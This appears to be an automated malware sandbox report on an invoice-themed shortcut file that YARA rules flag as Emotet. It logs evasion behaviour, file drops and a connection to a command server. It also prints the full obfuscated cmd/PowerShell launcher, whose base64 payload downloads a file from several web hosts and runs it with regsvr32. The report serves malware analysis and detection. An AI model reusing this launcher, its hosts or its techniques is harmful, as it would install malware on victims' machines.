                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\ZrCipB\RLcE.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\ZrCipB\RLcE.dll (copy)Jump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\ZrCipB\RLcE.dll:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep count: 5759 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5488Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep count: 399 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 1124Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5588Thread sleep time: -90000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-16419
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5759Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 399Jump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.5 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16420
                    Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16545
                    Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: svchost.exe, 00000008.00000002.704435082.000001F192629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`b
                    Source: svchost.exe, 00000008.00000002.705525389.000001F197E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                    Source: powershell.exe, 00000002.00000002.481251054.000001AFF9302000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704382465.000000000060D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527977239.000000000060D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.705504189.000001F197E56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704616242.0000027EE36EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704468644.0000027EE3678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 0000000A.00000002.704277913.0000022C9BE02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                    Source: svchost.exe, 0000000A.00000002.704435462.0000022C9BE28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52463280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA52463280
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52470215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_00007FFA52470215
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA524712E3 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00007FFA524712E3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52463280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA52463280
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA5246BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFA5246BE50

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCPJump to behavior

                    Language, Device and Operating System Detection

                    barindex
                    Yara detected Obfuscated Powershell
                    Source: Yara matchFile source: RechnungsDetails 2022.20.05_1044.lnk, type: SAMPLE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52468900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00007FFA52468900
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA52468860 HeapCreate,GetVersion,HeapSetInformation,3_2_00007FFA52468860

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Emotet
                    Source: Yara matchFile source: 3.2.regsvr32.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1e40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1e40000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.2220000.0.unpack, type: UNPACKEDPE
